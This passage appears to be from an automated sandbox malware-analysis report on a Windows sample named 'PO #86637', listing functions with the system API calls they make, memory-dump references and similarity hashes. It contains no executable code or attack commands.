                      • _wcstok.LIBCMT ref: 004438F8
                      • _wcslen.LIBCMT ref: 0044390C
                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                      • _wcstok.LIBCMT ref: 00443931
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                      • String ID:
                      • API String ID: 3632110297-0
                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                      Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteMenuObject$IconWindow
                      • String ID:
                      • API String ID: 752480666-0
                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                      Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                      • String ID:
                      • API String ID: 3275902921-0
                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                      Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                      • String ID:
                      • API String ID: 3275902921-0
                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                      Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                      Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32 ref: 004555C7
                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                      • String ID:
                      • API String ID: 3691411573-0
                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                      Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                      • LineTo.GDI32(?,?,?), ref: 004472AC
                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                      • LineTo.GDI32(?,?,?), ref: 004472C6
                      • EndPath.GDI32(?), ref: 004472D6
                      • StrokePath.GDI32(?), ref: 004472E4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                      • String ID:
                      • API String ID: 372113273-0
                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                      Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 0044CC6D
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CapsDevice$Release
                      • String ID:
                      • API String ID: 1035833867-0
                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                      Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0041708E
                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                      • __amsg_exit.LIBCMT ref: 004170AE
                      • __lock.LIBCMT ref: 004170BE
                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                      • _free.LIBCMT ref: 004170EE
                      • InterlockedIncrement.KERNEL32(02EE2CE0), ref: 00417106
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                      • String ID:
                      • API String ID: 3470314060-0
                      • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                      • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                      Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                      Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                      Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                      Download Yara Rule
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                      • ExitThread.KERNEL32 ref: 004151ED
                      • __freefls@4.LIBCMT ref: 00415209
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                      • String ID:
                      • API String ID: 442100245-0
                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                      Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                      • _wcslen.LIBCMT ref: 0045F94A
                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                      • String ID: 0
                      • API String ID: 621800784-4108050209
                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                      Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • SetErrorMode.KERNEL32 ref: 004781CE
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • SetErrorMode.KERNEL32(?), ref: 00478270
                      • SetErrorMode.KERNEL32(?), ref: 00478340
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                      • String ID: \VH
                      • API String ID: 3884216118-234962358
                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                      Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                      • IsMenu.USER32(?), ref: 0044854D
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                      • DrawMenuBar.USER32 ref: 004485AF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
